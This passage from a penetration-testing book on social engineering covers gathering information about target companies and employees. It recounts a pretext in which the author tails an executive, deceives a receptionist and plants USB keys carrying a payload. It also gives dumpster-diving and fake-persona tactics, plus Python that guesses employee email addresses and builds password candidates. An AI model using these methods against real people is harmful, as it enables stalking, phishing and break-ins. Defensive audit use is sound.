This chapter helps identify that balance. The first ingredient in any social engineer's recipe is information (detailed in the next section). The higher the quality of the information, the more likely you are to succeed. This chapter begins by discussing how to gather information, then moves on to the sources that can be used to harvest it. It would not be complete without discussing how to tie it all together and utilize these resources as a social engineer.

Gathering Information

Gathering information is like building a house. If you try to start with the roof, your house will surely be a failure. A good house is built on a solid foundation and from there, literally, from the ground up. As you gather information you may be overwhelmed by how to organize and then use the data, so starting a file, or a dedicated tool, in which to collect it is a good idea.

Many tools exist to assist in collecting and then using this data. For penetration tests and social engineering audits I use a Linux distribution called BackTrack that is designed specifically for this purpose. BackTrack is like most Linux distributions in that it is free and open source. Perhaps its greatest asset is that it contains more than 300 tools designed to assist in security auditing. (BackTrack has since been succeeded by Kali Linux, which carries the same tool set forward.)

All of the tools within BackTrack are also open source and free. Especially attractive is the high quality of BackTrack's tools, many of which rival and even surpass tools you would pay an arm and a leg for. Two BackTrack tools that are particularly useful for gathering and storing information are Dradis and BasKet. The following sections take a quick look at each.

Using BasKet

BasKet is similar in functionality to Notepad, but more like Notepad on steroids. It is presently maintained by Kelvie Wong and can be found for free either in BackTrack or at http://basket.kde.org/. The website has full instructions for installing BasKet. Once installed, BasKet is easy to use and the interface is not difficult to understand.

As seen in Figure 2-1, the interface is easy to figure out. Adding a new "Basket" to hold data is as simple as right-clicking on the left side of the screen and selecting New Basket.

Once new Baskets are added, the sky is the limit. You can copy and paste data, place screenshots in the Basket, or even tie in OpenOffice or other types of charts, graphs, and other utilities.

Figure 2-1: BasKet allows for easy organization of the data found during information gathering.

Adding a screenshot can be done in a few ways. The easiest is to copy the image, then right-click on the new Basket and click Paste. As shown in Figure 2-1, adding images is simple, and the image is displayed right away. Notes can be typed or pasted around the images by simply clicking in the Basket and starting to type.

In a normal security audit, what makes BasKet attractive is the way it catalogs data and shows it on the screen. I usually add a different Basket for each type of data, such as Whois, social media, and so on. After that, I will do some recon using Google Maps or Google Earth to capture some images of the client's building or facility, which I can store in BasKet as well. When the audit is complete, pulling up and utilizing this information quickly is very easy. Figure 2-2 illustrates a nearly complete BasKet that contains a lot of useful information and tabs.

As shown in Figure 2-2, BasKet makes it easy to store the information in an easy-to-read format. I try to include as much information as possible, because no piece of information is too small to store. What I include is items from the client's website, Whois information, social media sites, images, employee contact info, resumes found, forums, hobbies, and anything else I find linked to the company.

Figure 2-2: A nearly completed BasKet with lots of useful information.

When I am done, I simply click on the menu called Basket, then Export, and export the whole BasKet as an HTML page. This is great for reporting or sharing the data.

For a social engineer, collecting data, as will be discussed in detail later, is the crux of every gig, but if you cannot recall and utilize the data quickly, it becomes useless. A tool like BasKet makes retaining and utilizing data easy. If you give BasKet a try and use it once, you will be hooked. Remember, though, that the file you build is itself a high-value target: it holds exactly the personal and corporate details you were hired to show are dangerous, so keep it encrypted and within the engagement's scope and retention terms.

Using Dradis

Although BasKet is a great tool, if you do a lot of information gathering, or if you work on a team that needs to collect, store, and utilize data, then a tool that allows multi-user sharing of that data is important. Enter Dradis. According to its creators, the open-source Dradis is a "self-contained web application that provides a centralized repository of information" you have gathered, and a means by which to plan what's to come.

Like BasKet, Dradis is a free, open-source tool that can be found at http://dradisframework.org/. Whether you are using Linux, Windows, or a Mac, Dradis has easy-to-use setup and installation instructions at http://dradisframework.org/install.html.

Once Dradis is installed and set up, you simply browse to the localhost address and the port you assigned, or use the standard 3004. You can do this by opening a browser and typing https://localhost:3004/. Because Dradis is a shared web application, keep in mind that anyone who can reach that port and log in sees everything the team has gathered: bind it to localhost or a trusted network and protect the login accordingly.

Once logged in, you're greeted with the screen shown in Figure 2-3. Notice the Add Branch button at the top left. Adding a branch lets you add the same kinds of details you can in BasKet: notes, images, and more, and you can even import notes.

Figure 2-3: Dradis has a nice, easy-to-use interface.

Dradis and BasKet are just two of the tools I have used to collect and store data. The websites for both have very nice tutorials on setting up and using these powerful tools.

Whatever operating system you use, Mac, Windows, or Linux, there are choices out there for you. What is important is to use a tool that you are comfortable with and that can handle large amounts of data.

For that reason I suggest staying away from things like Notepad in Windows or Smultron or TextEdit on a Mac. You want to be able to format and highlight certain areas to make them stand out. In my Dradis server, pictured in Figure 2-3, I have a section for phone scripts. This is handy for transcribing ideas that might work based on the information I gathered.

These tools suggest how a social engineer begins to utilize the information he collects. The first stage in utilizing the information you gather is thinking like a social engineer.

Thinking Like a Social Engineer

Having a few hundred megabytes of data and pictures is great, but when you start reviewing it, how do you train yourself to review and then think about the data in a way that has maximum impact?

Of course you could just open a browser and type in long-winded random searches that may lead to some form of information, some of which may even be useful. But if you are hungry you probably don't just run to the kitchen, throw whatever ingredients you see into a bowl, and start digging in. Planning, preparation, and thought are what make the meal good. As with a real meal, a social engineer needs to plan, prepare, and think about what information he will try to obtain and how he will obtain it.

When it comes to this vital step of information gathering, many people will have to change the way they think. You have to approach the world of information in front of you with a different opinion and mindset than you normally may have. You have to learn to question everything and, when you see a piece of information, to think of it as a social engineer would. The way you ask questions of the Web or other sources must change. The way you view the answers that come back must also change. Overhearing a conversation, reading what seems like a meaningless forum post, seeing a bag of trash: you should assimilate this information in a different way than you did before. My mentor Mati gets excited when he sees a program crash. Why? Because he is a penetration tester and exploit writer. A crash is the first step to finding a vulnerability in software, so instead of being irritated at losing data he gets excited at the crash. A social engineer must approach information in much the same way. When you find a target who uses many different social media sites, look for the links between them and the information that, put together, creates a whole profile.

As an example, one time I rented a car to drive a few states away for business. My companion and I loaded all of our luggage in the trunk; as we were getting into the car we noticed a small bag of trash in the back seat. The other person said something like, "Service today just stinks. You figure for what you pay they would at least clean out the car."

True, you would expect that, but I stopped that bag from being chucked into the nearest can and said, "Let me just look at that really quick." As I opened the bag and pushed aside the Taco Bell wrappers, what was lying in plain sight was a shock to me: half of a ripped-up check. I quickly dumped out the bag and found a bank receipt and the other half of the check. The check had been written out for a couple thousand dollars and then just ripped up, not into tiny little pieces but into four large chunks, then thrown into a small bag with a Taco Bell wrapper. Taping it back together revealed this person's name, company name, address, phone number, bank account number, and bank routing number. Together with the bank receipt, I now had the balance of his account. Thankfully for him I am not a malicious person, because only a couple more steps are needed to commit identity theft.

This story illustrates how people view their valuable information. This guy rented the car before me, and because he threw the check away he felt it was gone, disposed of safely. Or so he thought; but this is not an isolated case. At this URL you can find a recent story about very valuable things people just threw away or sold for next to nothing at a garage sale: www.social-engineer.org/wiki/archives/BlogPosts/LookWhatIFound.html.

Things like:

  • A painting that a museum bought for $1.2 million
  • A 1937 Bugatti Type 57S Atalante with a mere 24,000 miles, sold for $3 million
  • A copy of the Declaration of Independence

If people throw away a painting with a hidden copy of the Declaration of Independence in it, then throwing away bills, medical records, old invoices, or credit card statements probably doesn't seem like such a huge deal to them.

How you interact with people in public can have devastating effects. In the following scenario I was asked to audit a company, and before I could proceed I needed to gather some data. Take a look at how simple, seemingly meaningless information can lead to a breach.

Simply following one of the higher-ups of the target company for a day or two showed me that he stopped for coffee every morning at the same time. Since I knew about his 7:30 a.m. stop at the local coffee shop, I could plan a "meeting." He would sit for 30 to 35 minutes, read the paper, and drink a medium cafe latte. I enter the shop about 3 to 5 minutes after he sits down. I order the same drink as him and sit down next to him. I look over as he puts one section of the paper down and ask whether I can read the section he is done with. Having already picked up a paper on the way, I knew that page three contained an article about a recent murder in the area. After acting as if I had just read it, I say out loud, "Even in these small towns things are scary nowadays. You live around here?"

Now at this point the target can blow me off, or, if I have played my cards right, my body language, vocal tone, and appearance will put him at ease. He says, "Yeah, I moved in a few years back for a job. I like small towns, but you hear this more and more."

I continue, "I am just traveling through the area. I sell high-end business consulting services to large companies and always enjoy traveling through the smaller towns, but I seem to hear more and more of these stories even in the rural areas." Then in a very joking tone I say, "You don't happen to be a bigwig in a large company that needs some consulting, do you?"

He laughs it off and then, as if I had just challenged him to prove his worth, says, "Well, I am a VP of finance at XYZ Corp. here locally, but I don't handle that department."

"Hey, look, I am not trying to sell you something, just enjoying my coffee, but do you think I could stop by and leave you some information tomorrow or Wednesday?"

This is where the story gets interesting, as he says, "Well, I would, but I am heading out for a much-needed vacation on Wednesday. But why don't you mail it to me and I will call you." He then hands me a card.

"Going somewhere warm and sunny, I hope?" I ask this knowing that I am probably getting close to the point where I need to cut it off.

"Taking the wife on a cruise south." I can tell he doesn't want to tell me where, which is fine, so we shake hands and part ways.

Now, could he have been blowing me off? Probably, but I have some valuable information:

  • His direct number
  • When he is leaving for vacation
  • What type of vacation
  • That he is local
  • The name of his company
  • His title in his company
  • That he recently relocated

Of course, some of this information I already had from previous information gathering, but I was able to add a substantial amount to it after this meeting. Now, to launch the next part of the attack, I call his direct line the day after he is supposed to be gone and ask for him, only to be told by his receptionist, "Sorry, Mr. Smith is on vacation. Can I take a message?"

Excellent. The information is verified, and now all I need to do is launch the final phase, which means dressing up in a suit and taking my $9 business cards to his office. I enter, sign in, and tell the receptionist I have an appointment with Mr. Smith at 10:00 a.m. To which she replies, "He is on vacation, are you sure it is today?"

Using my practice sessions on microexpressions, a topic addressed in Chapter 5, I show true surprise: "Wait, his cruise was this week? I thought he left next week."

Now this statement is vital. Why?

I want the appointment to be believable and I want the receptionist to trust me by proxy. By stating that I know about his cruise, I imply that Mr. Smith and I have had conversations intimate enough that I know his itinerary. But my helplessness elicits pity, and right away the secretary comes to my aid. "Oh, honey, I am sorry, do you want me to call his assistant?"

"Ah, no," I reply. "I really wanted to leave some information with him. How about this: I will just leave it with you and you can give it to him when he gets back? I am terribly embarrassed; maybe you can avoid even telling him I did this?"

"My lips are sealed."

"Thank you. Look, I am going to crawl out of here, but before I do, can I just use your bathroom?" I know that I normally would not be buzzed in, but I hope the combination of my rapport, my helplessness, and their pity will lead to success, and it does.

While in the bathroom, I place an envelope in one stall. On the envelope I put a sticker that says PRIVATE. Inside the "private" envelope is a USB key with a malicious payload on it. I do this in one stall and also in the hallway by a break room to increase my chances, hoping that whoever finds one of them is curious enough to plug it into their computer.

Sure enough, this method seems to always work. The scary thing is that this attack probably wouldn't have worked if it weren't for a "useless" little conversation in a coffee shop. Notice what each step depended on: the receptionist who confirmed the vacation to a stranger over the phone, the front desk that never checked the claimed appointment against a calendar, and whoever plugged in a USB key because an envelope said PRIVATE. Each of those is a point where a simple verification habit would have stopped the attack.

The point is not only that small data can still lead to a breach, but also how you collect this data. You need to understand and test the sources you can use to collect data until you are proficient with each method and each source. There are many different types of sources for collecting data. A good social engineer must be prepared to spend some time learning the strengths and weaknesses of each, as well as the best way to utilize each source. That is the topic of the next section.

Sources for Information Gathering

Many different sources exist for information gathering. The following list cannot possibly cover every source out there, but it does outline the major choices you have.

Gathering Information from Websites

Corporate and/or personal websites can provide a bounty of information. The first thing a good social engineer will often do is gather as much data as he can from the company's or person's website. Spending some quality time with the site can lead to a clear understanding of:

  • What they do
  • The products and services they provide
  • Physical locations
  • Job openings
  • Contact numbers
  • Biographies of the executives or board of directors
  • Support forums
  • Email naming conventions
  • Special words or phrases that can help in password profiling

Job openings deserve a second look: a posting that asks for experience with a particular product or platform tells you what the company runs. Seeing people's personal websites is also amazing, because they will link to almost every intimate detail of their lives: kids, houses, jobs, and more. This information should be cataloged into sections, because it will often be something from this list that is used in the attack.

Many times company employees will be part of the same forums, hobby lists, or social media sites. If you find one employee on LinkedIn or Facebook, chances are that many more are there as well. Gathering all that data can really help a social engineer profile the company as well as its employees. Many employees will mention their job title on their social media outlets. This can help a social engineer work out how many people may be in a department and how the departments are structured.
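To show what two items on that list give you in practice, here is an added example that is not part of the book: a Python script that extracts the email addresses from a page, infers the email naming convention from a couple of known name/address pairs, generates addresses for other employees found elsewhere (LinkedIn, executive bios), and pulls distinctive words from the page text for password profiling, a small version of what a tool such as CeWL does. The Acme Widgets page, the names, the acme.example domain, the year 1987, the list of conventions and the stop-word list are all constructed assumptions.

```python
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed "About us" page for a fictional company (not a real site).
SAMPLE_HTML = """
<html><head><title>Acme Widgets - About</title></head><body>
<h1>Acme Widgets: the leader in FlexiGear drive systems</h1>
<p>Founded in 1987 in Springfield, Acme builds FlexiGear and TurboCog products.</p>
<p>Press: contact Jane Smith at jsmith@acme.example or John Doe at jdoe@acme.example.</p>
<p>Careers: we are hiring SAP administrators and help desk staff in Springfield.</p>
</body></html>
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


class TextExtractor(HTMLParser):
    """Collect the visible text of a page, tags stripped."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def handle_data(self, data):
        self.chunks.append(data)


def page_text(html_text):
    parser = TextExtractor()
    parser.feed(html_text)
    return " ".join(parser.chunks)


def find_emails(text):
    return sorted(set(EMAIL_RE.findall(text)))


# Common corporate address formats, keyed by a short name (assumed list).
CONVENTIONS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "flast": lambda f, l: f"{f[0]}{l}",
    "firstl": lambda f, l: f"{f}{l[0]}",
    "first_last": lambda f, l: f"{f}_{l}",
    "lastf": lambda f, l: f"{l}{f[0]}",
    "first": lambda f, l: f,
}


def infer_convention(known):
    """known: [((first, last), email)]. Return the first convention that
    reproduces the local part of every sample, or None if none fits."""
    for name, fmt in CONVENTIONS.items():
        if all(fmt(f.lower(), l.lower()) == email.split("@")[0].lower()
               for (f, l), email in known):
            return name
    return None


def guess_emails(names, domain, convention):
    """Apply an inferred convention to names gathered from other sources."""
    fmt = CONVENTIONS[convention]
    return [f"{fmt(f.lower(), l.lower())}@{domain}" for f, l in names]


# Generic words that say nothing specific about this company (assumed list).
STOP = {"about", "founded", "products", "systems", "staff", "contact", "press",
        "careers", "hiring", "leader", "drive", "widgets", "administrators",
        "builds"}


def profile_words(text, min_len=5):
    """Distinctive tokens for password profiling, ranked by frequency.
    Email addresses are removed first so local parts and domains do not
    pollute the list."""
    text = EMAIL_RE.sub(" ", text)
    words = re.findall(r"[A-Za-z][A-Za-z0-9]{%d,}" % (min_len - 1), text)
    return Counter(w for w in words if w.lower() not in STOP)


def mangle(base, years=("1987",), suffixes=("!", "1", "123")):
    """Case and suffix rules turning one base word into password candidates."""
    out = set()
    for w in {base, base.lower(), base.capitalize()}:
        out.add(w)
        out.update(w + s for s in suffixes)
        out.update(w + y for y in years)
    return sorted(out)


if __name__ == "__main__":
    text = page_text(SAMPLE_HTML)
    known = [(("Jane", "Smith"), "jsmith@acme.example"),
             (("John", "Doe"), "jdoe@acme.example")]
    convention = infer_convention(known)
    print("addresses:", find_emails(text), "convention:", convention)
    print("guessed:", guess_emails([("Mary", "Jones")], "acme.example", convention))
    for word, count in profile_words(text).most_common(4):
        print(count, word, mangle(word)[:5])
```

Two known pairs are enough here to settle on the "flast" convention, which is what lets a name from a LinkedIn search become a deliverable address. The word list is deliberately short on generic vocabulary: product names, the founding year and the town are the tokens that end up in real passwords, which is why they are worth storing in the Basket alongside the rest of the profile.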

 

Search Engines

Johnny Long wrote a famous book called Google Hacking for Penetration Testers and really opened many people’s eyes to the amazing amount of information that Google holds.

Google forgives but it never forgets, and it has been compared to the Oracle. As long as you know how to ask, it can tell you most anything you want to know.

Johnny developed a list of what he calls “Google Dorks,” strings that can be used in a Google search to find out information about a company. For example, if you were to type in site:microsoft.com filetype:pdf, you would be given a list of every file with the extension PDF that is on the microsoft.com domain.

Being familiar with search terms that can help you locate files on your target is a very important part of information gathering. I make a habit of searching for filetype:pdf, filetype:doc, filetype:xls, and filetype:txt. It is also a good idea to see whether employees actually leave files like DAT, CFG, or other database or configuration files open on their servers to be harvested.

Entire books are dedicated to the topic of using Google to find data, but the main thing to remember is that learning about Google’s search operators will help you develop your own.

A website like www.googleguide.com/advanced_operators.html has a very nice list of both the operators and how to use them.

Google is not the only search engine that reveals amazing information. A researcher named John Matherly created a search engine he called Shodan (www.shodanhq.com).

Shodan is unique in that it searches the net for servers, routers, specific software, and so much more. For example, a search of microsoft-iis os:“windows 2003” reveals the following number of servers running Windows 2003 with Microsoft IIS:

  • United States 59,140
  • China 5,361
  • Canada 4,424
  • United Kingdom 3,406
  • Taiwan 3,027

This search is not target-specific, but it does demonstrate one vital lesson: the web contains an amazing wealth of information that needs to be tapped by a social engineer seeking to become proficient at information gathering.

Whois Reconnaissance

Whois is the name of both a service and a database. Whois databases contain a wealth of information that in some cases can even include full contact information for the website administrators.

Using a Linux command prompt or a website like www.whois.net can lead you to surprisingly specific results, such as a person’s email address, telephone number, or even DNS server IP addresses.

Whois information can be very helpful in profiling a company and finding out details about its servers. All of this information can be used for further information gathering or to launch social engineering attacks.
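
As an added example that is not part of the book, here is a small Python check of what a whois record for your own domain hands out before anyone else looks it up. The record text, domain, registrar and names are constructed for the example; the “Key: Value” layout follows the common Registrant/Admin/Tech form.

```python
import re

# Constructed sample record (hypothetical domain, registrar and person); the
# "Key: Value" layout follows the common Registrant/Admin/Tech form.
SAMPLE_WHOIS = """\
Domain Name: example-corp.test
Registrar: Example Registrar, Inc.
Name Server: NS1.EXAMPLE-CORP.TEST
Name Server: NS2.EXAMPLE-CORP.TEST
Registrant Name: Jane Admin
Registrant Organization: Example Corp
Registrant Street: 12 Sample Road
Registrant Phone: +1.5555550123
Registrant Email: jane.admin@example-corp.test
Admin Email: REDACTED FOR PRIVACY
Tech Email: jane.admin@example-corp.test
"""

# Fields that identify a person rather than the organisation.
PERSONAL_FIELDS = ("Registrant Name", "Registrant Street", "Registrant Phone",
                   "Registrant Email", "Admin Email", "Tech Email")
# Values a registrar substitutes when privacy protection is switched on.
REDACTED = re.compile(r"redacted|privacy|proxy", re.I)
# Role mailboxes reveal far less than a named person's address.
ROLE_MAILBOXES = {"hostmaster", "dns", "domains", "noc", "abuse", "postmaster"}


def parse_whois(text):
    """Parse 'Key: Value' lines into {key: [values]} (keys such as Name Server repeat)."""
    record = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and value.strip():
            record.setdefault(key.strip(), []).append(value.strip())
    return record


def is_personal_email(addr, domain):
    """True for a mailbox named after a person on the organisation's own domain."""
    local, _, dom = addr.lower().rpartition("@")
    return dom == domain.lower() and local not in ROLE_MAILBOXES


def whois_exposure(text, domain):
    """Return (field, value, note) for every personal contact value a whois
    lookup would hand out in the clear, i.e. not replaced by a privacy proxy."""
    record = parse_whois(text)
    findings = []
    for field in PERSONAL_FIELDS:
        for value in record.get(field, []):
            if REDACTED.search(value):
                continue
            note = "exposed"
            if "@" in value and is_personal_email(value, domain):
                note = "named person on own domain; prefer a role mailbox"
            findings.append((field, value, note))
    return findings


if __name__ == "__main__":
    for field, value, note in whois_exposure(SAMPLE_WHOIS, "example-corp.test"):
        print(f"{field:18} {value:32} {note}")
```
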

 

Public Servers

A company’s publicly reachable servers are also great sources for what its websites don’t say. Fingerprinting a server for its OS, installed applications, and IP information can say a great deal about a company’s infrastructure. After you determine the platform and applications in use, you could combine this data with a search on the corporate domain name to find entries on public support forums.

IP addresses may tell you whether the servers are hosted locally or with a provider; with DNS records you can determine server names and functions, as well as IPs.

In one audit, after searching the web using the tool called Maltego (discussed in Chapter 7), I was able to uncover a publicly facing server that housed literally hundreds of documents with key pieces of information about projects, clients, and the creators of those documents. This information was devastating to the company.

An important note to keep in mind is that performing a port scan—using a tool like NMAP or another scanner to locate open ports, software, and operating systems used on a public server—can lead to problems with the law in some areas.

For example, in June 2003, an Israeli, Avi Mizrahi, was accused by the Israeli police of the offense of attempting unauthorized access to computer material. He had port scanned the Mossad website. About eight months later, he was acquitted of all charges. The judge even ruled that these kinds of actions should not be discouraged when they are performed in a positive way (www.law.co.il/media/computer-law/mizrachi_en.pdf).

In December 1999, Scott Moulton was arrested by the FBI and accused of attempted computer trespassing under Georgia’s Computer Systems Protection Act and the Computer Fraud and Abuse Act of America. At the time, his IT service company had an ongoing contract with Cherokee County, Georgia, to maintain and upgrade the 911 center security (www.securityfocus.com/news/126).

As part of his work, Moulton performed several port scans on Cherokee County servers to check their security and eventually port scanned a web server monitored by another IT company. This provoked a lawsuit, although he was acquitted in 2000. The judge ruled that no damage had occurred that would impair the integrity and availability of the network.

In 2007 and 2008, England, France, and Germany passed laws that make it unlawful to create, distribute, or possess materials that allow someone to break any computer law. Port scanners fall under this description.

Of course, if you are involved in a paid audit of a company, most of this will be covered in the contract, but it is important to state that it is up to the social engineer auditor to be aware of the local laws and make sure you are not breaking them.

Social Media

Many companies have recently embraced social media. It’s cheap marketing that touches a large number of potential customers. It’s also another stream of information from a company that can provide breadcrumbs of viable information. Companies publish news on events, new products, press releases, and stories that may relate them to current events.

Lately, social networks have taken on a mind of their own. When one becomes successful, it seems that a few more pop up that utilize similar technology. With sites like Twitter, Blippy, PleaseRobMe, ICanStalkU, Facebook, LinkedIn, MySpace, and others, you can find information about people’s lives and whereabouts out in the open. Later, this book will discuss this topic in much more depth, and you will see that social networks are amazing sources of information.

User Sites, Blogs, and So On

User sites such as blogs, wikis, and online videos may provide not only information about the target company, but also a more personal connection through the user(s) posting the content. A disgruntled employee who’s blogging about his company’s problems may be susceptible to a sympathetic ear from someone with similar opinions or problems. Either way, users are always posting amazing amounts of data on the web for anyone to see and read.

Case in point: take a look at a new site that has popped up, www.icanstalku.com (see Figure 2-4). Contrary to its name, it does not encourage people to actually stalk others. This site points to the complete thoughtlessness of many Twitter users. It scrapes the Twitter site and looks for users who are silly enough to post pictures taken with their smart phones. Many people do not realize that most smart phones embed GPS location data in their photos. When a user posts a picture to the web with this data embedded, it can lead a person right to their location.

Displaying location-based information is a scary aspect of social media websites. Not only do they allow you to post pictures of yourself, they also implicitly reveal your location—possibly without your knowledge.
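
As an added example (not from the book and not ICanStalkU’s code), the following Python script shows exactly what the site relies on and the simple fix: it reads the GPS coordinates out of a JPEG’s Exif APP1 segment and strips that segment before the photo is shared. The JPEG, which carries no image data, and the coordinates are constructed in the code.

```python
import struct

# Real TIFF/EXIF tag and field-type numbers.
TAG_GPS_IFD = 0x8825
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004
TYPE_ASCII, TYPE_LONG, TYPE_RATIONAL = 2, 4, 5


def _to_rationals(value):
    """Split decimal degrees into the (deg, min, sec) RATIONALs EXIF stores."""
    value = abs(value)
    deg, minutes = int(value), int((value - int(value)) * 60)
    seconds = round(((value - deg) * 60 - minutes) * 6000)  # in 1/100 s
    return [(deg, 1), (minutes, 1), (seconds, 100)]


def build_sample_jpeg(lat, lon):
    """Constructed sample: a JPEG with no image data whose APP1 Exif segment
    carries a GPS IFD laid out the way a smartphone camera writes it."""
    ifd0_off = 8                              # IFD0 right after the TIFF header
    gps_ifd_off = ifd0_off + 2 + 12 + 4       # IFD0 holds one entry
    data_off = gps_ifd_off + 2 + 4 * 12 + 4   # RATIONAL data after the GPS IFD
    tiff = b"MM\x00\x2a" + struct.pack(">I", ifd0_off)  # big-endian TIFF header
    tiff += struct.pack(">H", 1)
    tiff += struct.pack(">HHII", TAG_GPS_IFD, TYPE_LONG, 1, gps_ifd_off)
    tiff += struct.pack(">I", 0)              # no further IFD
    tiff += struct.pack(">H", 4)
    tiff += struct.pack(">HHI", GPS_LAT_REF, TYPE_ASCII, 2) + (b"N" if lat >= 0 else b"S") + b"\0\0\0"
    tiff += struct.pack(">HHII", GPS_LAT, TYPE_RATIONAL, 3, data_off)
    tiff += struct.pack(">HHI", GPS_LON_REF, TYPE_ASCII, 2) + (b"E" if lon >= 0 else b"W") + b"\0\0\0"
    tiff += struct.pack(">HHII", GPS_LON, TYPE_RATIONAL, 3, data_off + 24)
    tiff += struct.pack(">I", 0)
    for num, den in _to_rationals(lat) + _to_rationals(lon):
        tiff += struct.pack(">II", num, den)
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def _segments(jpeg):
    """Yield (marker, start, end) for each marker segment before the image data."""
    pos = 2                                   # skip SOI
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF and jpeg[pos + 1] not in (0xD9, 0xDA):
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield jpeg[pos + 1], pos, pos + 2 + length
        pos += 2 + length


def _is_exif(jpeg, marker, start):
    return marker == 0xE1 and jpeg[start + 4:start + 10] == b"Exif\0\0"


def _read_ifd(tiff, off, bo):
    """Return {tag: (type, count, raw 4-byte value-or-offset)} for one IFD."""
    entries = {}
    for i in range(struct.unpack(bo + "H", tiff[off:off + 2])[0]):
        e = off + 2 + 12 * i
        tag, typ, cnt = struct.unpack(bo + "HHI", tiff[e:e + 8])
        entries[tag] = (typ, cnt, tiff[e + 8:e + 12])
    return entries


def _degrees(tiff, bo, entry):
    """Resolve a 3 x RATIONAL entry (deg, min, sec) to decimal degrees."""
    off = struct.unpack(bo + "I", entry[2])[0]
    parts = []
    for i in range(3):
        num, den = struct.unpack(bo + "II", tiff[off + 8 * i:off + 8 * i + 8])
        parts.append(num / den if den else 0.0)
    return parts[0] + parts[1] / 60 + parts[2] / 3600


def extract_gps(jpeg):
    """Return (lat, lon) in decimal degrees if the JPEG carries GPS EXIF, else None."""
    for marker, start, end in _segments(jpeg):
        if not _is_exif(jpeg, marker, start):
            continue
        tiff = jpeg[start + 10:end]
        bo = ">" if tiff[:2] == b"MM" else "<"  # byte order from the TIFF header
        ifd0 = _read_ifd(tiff, struct.unpack(bo + "I", tiff[4:8])[0], bo)
        gps = {}
        if TAG_GPS_IFD in ifd0:
            gps = _read_ifd(tiff, struct.unpack(bo + "I", ifd0[TAG_GPS_IFD][2])[0], bo)
        if GPS_LAT not in gps or GPS_LON not in gps:
            return None
        lat, lon = _degrees(tiff, bo, gps[GPS_LAT]), _degrees(tiff, bo, gps[GPS_LON])
        lat = -lat if gps.get(GPS_LAT_REF, (0, 0, b"N"))[2][:1] == b"S" else lat
        lon = -lon if gps.get(GPS_LON_REF, (0, 0, b"E"))[2][:1] == b"W" else lon
        return round(lat, 4), round(lon, 4)
    return None


def strip_exif(jpeg):
    """Drop every APP1 Exif segment: the simplest safe fix before a photo is shared."""
    out, pos = bytearray(jpeg[:2]), 2
    for marker, start, end in _segments(jpeg):
        out += jpeg[pos:start]
        if not _is_exif(jpeg, marker, start):
            out += jpeg[start:end]            # keep non-Exif segments (e.g. JFIF APP0)
        pos = end
    out += jpeg[pos:]                         # image data and EOI are untouched
    return bytes(out)
```

Running `extract_gps` on a photo before and after `strip_exif` shows the coordinates disappear along with the segment; real photos also carry camera model and timestamps in the same segment, which the same call removes.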

 

Sites like ICanStalkU underscore the danger of this information. Check out a story (one of many) that shows how this data is used for home break-ins, robberies, and sometimes more at www.social-engineer.org/wiki/archives/BlogPosts/TwitterHomeRobbery.html.

This type of information can give you a very detailed profile of your target. People love to tweet about where they are, what they are doing, and who they are with. Blippy allows a person to connect their bank accounts, and in essence it will “tweet” each purchase, where it was made, and how much it cost. Add pictures with embedded location data, and then sites like Facebook, which many use to post personal pictures, stories, and other related information, and it is a social engineer’s dream. In a short while a whole profile can be developed with a person’s address, job, pictures, hobbies, and more.

Another aspect of social media sites that makes them excellent sources for information gathering is the ability to be anonymous. If the target is a recently divorced middle-aged man who loves his Facebook page, you can be a young woman who is looking for a new friend. Many times, while flirting, people divulge valuable pieces of information. Combine the ability to be anyone or anything you want on the web with the fact that most people believe everything they read as gospel fact, and what you have is one of the greatest risks to security.

Figure 2-4: A typical scene on the homepage of ICanStalkU.com.

Public Reports

Public data may be generated by entities inside and outside the target company. This data can consist of quarterly reports, government reports, analyst reports, earnings posted for publicly traded companies, and so on. Examples are Dun & Bradstreet reports or other sales reports that are sold for very little money and contain a lot of details on the target company.

Another avenue, discussed in more detail later, is using background checkers such as those found at www.USSearch.com and www.intelius.com. These sites, along with many others, offer background check services for as little as $1 for one limited report up to a $49 per month fee that lets you run as many checks as you want. You can get much of this information for free using search engines, but some of the detailed financial data and personal information can only be obtained easily and legally through a paid-for service. Perhaps most shocking is that many of these companies may even provide data like a person’s Social Security Number to some customers.

Using the Power of Observation

Though not used enough as a social engineering tool, simple observation can tell you much about your target. Do the target’s employees use keys, RFID cards, or other methods to enter the building? Is there a designated area for smoking? Are dumpsters locked, and does the building have external cameras? External devices such as power supplies or air conditioning units usually reveal who the service company is, and that can give the social engineer another vector to gain access.

These are just a few of the questions that you can get answers to through observation. Taking some time to watch the target, filming with a covert camera, and then studying and analyzing the information later can teach you a lot and give your information file a major boost.

Going through the Garbage

Yes, as hard as it is to imagine enjoying digging through the trash, it can yield one of the most lucrative payoffs for information gathering. People often throw away invoices, notices, letters, CDs, computers, USB keys, and a plethora of other devices and reports that can truly give amazing amounts of information. As mentioned previously, if people are willing to throw away art that is worth millions, then things they view as trash will often go, without a second thought, right into the garbage.

Sometimes companies shred documents they deem too important to just throw out, but they use an inefficient shredder that leaves paper too easy to put back together, as shown in Figure 2-5.

Figure 2-5: Large one-way shreds leave some words still readable.

This image shows a few documents after shredding, but some whole words are still discernible. This type of shredding can be thwarted with a little time and patience and some tape, as seen in Figure 2-6. Documents that can be even partially taped back together can reveal some very devastating information.

Figure 2-6: Putting documents back together only takes time and patience.

However, using a shredder that shreds in both directions into a fine minced mess makes taping documents back together nearly impossible, as shown in Figure 2-7.

Figure 2-7: You can hardly tell this was once money.

Many companies use commercial services that take their shredded documents away for incineration. Some companies even leave the shredding to a third party, which, as you probably guessed, leaves them open to another attack vector. A social engineer who finds out the name of their vendor for this can easily mimic the pickup person and be handed all their documents. Nevertheless, dumpster diving can offer a quick way to find all the information you want. Remember some key pointers when performing a dumpster dive:

  • Wear good shoes or boots: Nothing will ruin your day faster than jumping in a dumpster and having a nail go through your foot. Make sure your shoes tie on nice and tight and offer protection from sharp objects.
  • Wear dark clothing: This doesn’t need much explanation. You probably want to wear clothes you don’t mind having to get rid of, and dark clothes to avoid being detected.
  • Bring a flashlight.
